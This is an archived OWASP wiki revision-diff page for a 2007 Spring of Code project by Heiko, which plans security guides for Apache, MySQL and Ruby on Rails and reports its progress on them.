This site is the archived OWASP Foundation Wiki and is no longer accepting Account Requests.
To view the new OWASP Foundation website, please visit https://owasp.org
Difference between revisions of "SpoC 007 - Web Application Security put into practice"
(New page: '''[http://www.owasp.org/index.php/OWASP_Spring_Of_Code_2007_Selection Back to SpoC 007 Selection page]''' '''AoC Candidate''': Heiko '''Project coordinator''': Dinis Cruz '''Project P...) |
|||
Line 6: | Line 6: | ||
'''Project coordinator''': Dinis Cruz | '''Project coordinator''': Dinis Cruz | ||
− | '''Project Progress''': | + | '''Project Progress''': 60% Complete, [[SpoC 007 - Web Application Security put into Practice - Progress Page|Progress Page]] |
== Heiko - Web Application Security put into practice == | == Heiko - Web Application Security put into practice == | ||
+ | This project is about web application security put into practice, because I understand that clear examples in the specific programming language and best practices with explanation educate the best. | ||
− | + | The Ruby on Rails Security project [http://www.rorsecurity.info/] started this year and is the only security initiative for Ruby on Rails. Ruby is the fastest growing level A programming language, according to the Tiobe programming community index [http://www.tiobe.com/tpci.htm], partly because of its advertised simplicity. This is dangerous, as programmers could be enticed to do cargo cult programming [http://en.wikipedia.org/wiki/Cargo_cult_programming] without knowing the security impacts. I found several security holes in popular modules, and even the Rails framework itself generates potentially insecure code. Nevertheless, Rails provides good means against many of the OWASP Top Ten security flaws, but I believe these means have to be popularized much more. | |
− | + | == Objectives == | |
+ | * Create a security guide to the most popular web server software, Apache | ||
+ | * Create a security guide to the popular database software, MySQL | ||
+ | * Ruby on Rails security guide and code examples for each of the OWASP Top Ten | ||
− | + | == Spring Of Code 007 == | |
+ | This project was selected for the spring of code 007 [http://www.owasp.org/index.php/OWASP_Spring_Of_Code_2007_Applications#Heiko_-_Web_Application_Security_put_into_practice]. | ||
− | + | '''Progress''' | |
− | + | * Apache Guide (done) | |
− | + | * MySQL Guide (done) | |
− | * | + | * Ruby On Rails Guide (on the way) |
− | |||
− | |||
− | * | ||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | * | ||
− | |||
− | |||
− | Ruby | ||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
+ | == Resources == | ||
+ | * The Ruby on Rails Security project [http://www.rorsecurity.info/] | ||
'''[http://www.owasp.org/index.php/OWASP_Spring_Of_Code_2007_Selection Back to SpoC 007 Selection page]''' | '''[http://www.owasp.org/index.php/OWASP_Spring_Of_Code_2007_Selection Back to SpoC 007 Selection page]''' |
Revision as of 09:58, 14 July 2007
Back to SpoC 007 Selection page
AoC Candidate: Heiko
Project coordinator: Dinis Cruz
Project Progress: 60% Complete, Progress Page
Heiko - Web Application Security put into practice
This project is about web application security put into practice, because I understand that clear examples in the specific programming language and best practices with explanation educate the best.
The Ruby on Rails Security project [1] started this year and is the only security initiative for Ruby on Rails. Ruby is the fastest growing level A programming language, according to the Tiobe programming community index [2], partly because of its advertised simplicity. This is dangerous, as programmers could be enticed to do cargo cult programming [3] without knowing the security impacts. I found several security holes in popular modules, and even the Rails framework itself generates potentially insecure code. Nevertheless, Rails provides good means against many of the OWASP Top Ten security flaws, but I believe these means have to be popularized much more.
Objectives
- Create a security guide to the most popular web server software, Apache
- Create a security guide to the popular database software, MySQL
- Ruby on Rails security guide and code examples for each of the OWASP Top Ten
Spring Of Code 007
This project was selected for the spring of code 007 [4].
Progress
- Apache Guide (done)
- MySQL Guide (done)
- Ruby On Rails Guide (on the way)
Resources
- The Ruby on Rails Security project [5]